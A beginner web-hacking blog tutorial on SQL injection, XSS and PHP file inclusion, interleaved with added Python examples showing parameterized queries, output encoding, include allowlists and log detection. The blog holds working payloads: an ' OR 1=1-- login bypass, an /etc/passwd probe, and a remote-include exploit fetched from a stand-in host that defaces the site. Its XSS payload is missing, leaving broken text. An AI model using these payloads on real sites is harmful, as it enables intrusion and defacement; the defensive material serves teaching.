Hello guys. I was a bit busy, so after a long time I'll be posting
something new for the beginners in the world of hacking. Today I'll show
you how websites get hacked through common vulnerabilities. Note: I assume
you have some basic knowledge of HTML and PHP. Intended for educational purposes. Bad intentions, GET LOST!!!!!!!
So let's begin.
SQL Injection
SQL injection is the act of injecting your own, custom-crafted SQL
commands into a web script so that you can manipulate the database any
way you want. Some example uses of SQL injection: bypassing login
verification, adding a new admin account, lifting passwords, lifting credit-card
details, etc.; you can access anything that's in the database.
Example Vulnerable Code – login.php (PHP/MySQL)
Here's an example of vulnerable login code:
PHP Code:
<?php
$user = $_POST['u'];
$pass = $_POST['p'];
if (!isset($user) || !isset($pass)) {
    echo("<form method=post>
");
} else {
    // $user and $pass are dropped straight into the query string: this is the injection point
    $sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
    // old mysql_* extension (removed in PHP 7); it offers no parameter binding
    $ret = mysql_query($sql);
    $ret = mysql_fetch_array($ret);
    if ($ret[0] != "") {
        echo("Welcome, $user.");
    } else {
        echo("Incorrect login details.");
    }
}
?>
Basically what this code does is take the username and password input
and look up the user's IP in the database in order to check the
validity of the username/password combo: a row only comes back if the
query matched.
Testing Inputs For Vulnerability
Just throw a single quote (') into the inputs and see if it outputs an error; if
so, it's probably injectable. If it doesn't display anything, it might
still be injectable, and if it is, you will be dealing with blind SQL
injection, which anyone can tell you is no fun. Otherwise, it's not
injectable.
The Example Exploit
Let's say we know the admin's username is Administrator and we want into
his account. Since the code doesn't filter our input, we can insert
anything we want into the statement and just let ourselves in. To do
this, we would simply put "Administrator" in the username box and "' OR
1=1--" in the password box; the resulting SQL query run against
the database would be:
SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password`='' OR 1=1--'
Because of the "OR 1=1", the password requirement is ignored: as we all
know, the logic of "OR" only requires one of its conditions to be true
for the whole expression to succeed, and since 1 always equals 1, it works.
The "--" is the comment-out sequence in SQL, which means everything after
it is ignored; otherwise the trailing "'" would ruin the syntax and
just cause the query to fail.
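To make the testing step and the exploit above concrete from the defender's side, here is an added example (mine, not the blog's code) in Python rather than PHP, so that it runs offline against an in-memory SQLite database. The `users` table and its rows are constructed sample data. `login_vulnerable` builds the query exactly the way login.php does; `login_safe` is the fix, a parameterized query, which in PHP corresponds to prepared statements via mysqli or PDO. `probe_is_injectable` automates the single-quote test from the page.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the page's `users` table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, IP TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("Administrator", "s3cret", "10.0.0.1"), ("bob", "hunter2", "10.0.0.2")],
    )
    return db


def login_vulnerable(db, user, password):
    # Same construction as login.php: the values are interpolated into the SQL text,
    # so a quote in the input changes the structure of the statement.
    sql = f"SELECT IP FROM users WHERE username='{user}' AND password='{password}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, user, password):
    # Parameterized query: the driver passes the values separately from the SQL text,
    # so quotes and "--" inside them are just data and can never alter the WHERE clause.
    sql = "SELECT IP FROM users WHERE username=? AND password=?"
    row = db.execute(sql, (user, password)).fetchone()
    return row[0] if row else None


def probe_is_injectable(db, login):
    # The page's quote test: a lone ' in the password breaks the statement only when the
    # input is spliced into the SQL text. SQLite reports the broken syntax as OperationalError.
    try:
        login(db, "Administrator", "'")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1--"
    print("string-built query :", login_vulnerable(db, "Administrator", payload))  # 10.0.0.1
    print("parameterized query:", login_safe(db, "Administrator", payload))        # None
    print("quote probe, vulnerable:", probe_is_injectable(db, login_vulnerable))   # True
    print("quote probe, safe      :", probe_is_injectable(db, login_safe))         # False
```

With the string-built query, the injected `OR 1=1` makes the WHERE clause true for every row and the first row's IP comes back, which is exactly the "logged in as Administrator" outcome described above. The parameterized version looks for a user whose password is literally `' OR 1=1--`, finds none, and rejects the login; it also survives the quote probe without an error, which is why the page's test no longer reveals anything.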
XSS (Cross-Site Scripting)
This vulnerability allows an attacker's input to be sent to
unsuspecting victims. The primary use of this vulnerability is cookie
stealing: if an attacker steals your cookie, they can log into whatever
site they stole your cookie from under your account (usually, and
assuming you were logged in at the time).
Example Vulnerable Code – search.php (PHP)
PHP Code:
<?php
$s = $_GET['search'];
// a real search engine would do some database stuff here
// the raw query parameter is echoed straight into the HTML: this is the XSS point
echo("You searched for $s. There were no results found");
?>
Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as
"<font color=red>XSS</font>". If the site is vulnerable to
XSS, you will see the word XSS rendered in red; otherwise it's not vulnerable.
Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to goatse (don't look
that up if you don't know what it is) by tricking them into clicking on
a link pointed to "search.php?search=// ". This will output "You
searched for // . There were no results found" (HTML), and assuming the
target's browser supports JS (JavaScript), which all modern browsers do
unless the setting is turned off, it will redirect them to abc.
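The reflected-HTML test and the cookie-stealing scenario above, as an added example of my own (not the blog's code), again in Python so that it runs without a web server. `render_search_vulnerable` mirrors search.php; `render_search_safe` is the fix, HTML-encoding the value before it enters the page, which in PHP is `htmlspecialchars($s, ENT_QUOTES, 'UTF-8')`. `reflects_unescaped` automates the page's `<font color=red>XSS</font>` check, and `hardening_headers` shows the response headers that blunt cookie theft even if an encoding bug slips through; the session id value is a placeholder.

```python
import html

PROBE = "<font color=red>XSS</font>"  # the page's own test input


def render_search_vulnerable(s):
    # Mirrors search.php: the raw query parameter is concatenated into the HTML response.
    return f"You searched for {s}. There were no results found"


def render_search_safe(s):
    # Encode <, >, &, " and ' before the value enters the HTML, so it can only ever be text.
    # PHP equivalent: htmlspecialchars($s, ENT_QUOTES, 'UTF-8').
    return f"You searched for {html.escape(s, quote=True)}. There were no results found"


def reflects_unescaped(render, probe=PROBE):
    # Automates the page's check: vulnerable if the probe markup comes back verbatim.
    return probe in render(probe)


def hardening_headers(session_id):
    # Defence in depth for the cookie-theft scenario the page describes:
    # HttpOnly keeps the session cookie out of document.cookie, Secure keeps it off plain HTTP,
    # SameSite=Lax stops most cross-site sends, and a CSP without 'unsafe-inline' refuses to
    # run injected inline script at all.
    return {
        "Set-Cookie": f"session={session_id}; HttpOnly; Secure; SameSite=Lax",
        "Content-Security-Policy": "default-src 'self'",
    }


if __name__ == "__main__":
    for render in (render_search_vulnerable, render_search_safe):
        print(render.__name__, "reflects unescaped:", reflects_unescaped(render))
        print("   ", render(PROBE))
    for name, value in hardening_headers("placeholder-session-id").items():
        print(f"{name}: {value}")
```

Encoding at the point of output is the actual fix; the headers do not make an XSS bug go away, they only limit what a successful injection can reach, so they belong alongside the encoding rather than instead of it.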
RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file and have it parsed and executed on the server.
Example Vulnerable Code – index.php (PHP)
PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
    include($page);
} else {
    include("home.php");
}
?>
Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it
is vulnerable to RFI and consequently LFI. If you don't, it's not
vulnerable to RFI, but it still may be vulnerable to LFI. Assuming the
server is running *nix, try viewing "index.php?p=/etc/passwd"; if you
see the passwd file, it's vulnerable to LFI; otherwise it's not vulnerable
to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server:
PHP Code:
<?php
unlink("index.php");
system("echo Hacked > index.php");
?>
and then we view "index.php?p=http://our.site.com/malicious.php"; our
malicious code will then be run on their server, and as a result their
site will simply say 'Hacked'.
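The include test and the exploit above, seen from the defender's side, as an added example of my own (not the blog's code), in Python rather than PHP so it runs offline. `resolve_page_vulnerable` mirrors index.php; `resolve_page_safe` is the fix, an allowlist that maps `?p=` keys to known files and never hands user input to the include, with a containment check as a second line of defence. `flag_include_requests` runs the same idea over access-log lines to spot the probes the page describes. The page directory, the page names and the log lines are all constructed for this example.

```python
import posixpath
import re
import urllib.parse

PAGE_DIR = "/var/www/app/pages"  # assumed location of the includable pages
PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}  # allowlist


def resolve_page_vulnerable(p):
    # Mirrors index.php: whatever ?p= says is what gets included, URL or absolute path alike.
    return p if p else "home.php"


def resolve_page_safe(p):
    # Allowlist: only known keys map to files; anything unknown falls back to the home page,
    # so user input never reaches the filesystem or the URL wrappers of include().
    filename = PAGES.get(p or "home", PAGES["home"])
    full = posixpath.normpath(posixpath.join(PAGE_DIR, filename))
    # Containment check: even a mistake in the allowlist cannot escape PAGE_DIR.
    if posixpath.commonpath([PAGE_DIR, full]) != PAGE_DIR:
        raise ValueError("include outside page directory")
    return full


def is_suspicious_include(p):
    # Deliberately broad triage rule: any scheme (http://, php://, ...), any traversal,
    # any absolute path or a NUL byte is something a legitimate ?p= value never contains.
    return "://" in p or ".." in p or p.startswith("/") or "\0" in p


# Constructed access-log sample; the second client is probing exactly as the page describes.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?p=about HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?p=http://www.google.com/ HTTP/1.1" 200 9821
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?p=/etc/passwd HTTP/1.1" 200 2103
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?p=../../../../etc/passwd HTTP/1.1" 200 2103
"""


def flag_include_requests(log_text):
    # Returns (client_ip, decoded p value) for every request whose ?p= looks like an include probe.
    flagged = []
    for line in log_text.splitlines():
        m = re.search(r'GET /index\.php\?p=([^ "]+)', line)
        if not m:
            continue
        p = urllib.parse.unquote(m.group(1))
        if is_suspicious_include(p):
            flagged.append((line.split()[0], p))
    return flagged


if __name__ == "__main__":
    for p in ("about", "http://www.google.com/", "/etc/passwd"):
        print(f"{p!r:28} vulnerable -> {resolve_page_vulnerable(p)!r:28} safe -> {resolve_page_safe(p)!r}")
    for ip, p in flag_include_requests(SAMPLE_LOG):
        print("suspicious include from", ip, ":", p)
```

The allowlist is what actually closes both RFI and LFI: with it, the three probes from the page all resolve to home.php. The log rule is for the operations side, where a 200 response to `?p=/etc/passwd` or to a URL is the signal that the check is missing on a server you run.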
Hope you got something out of this. Next time I'll be posting new tutorials and hacks. Keep reading.
Please comment if I have done well or if you have finished learning from the blog.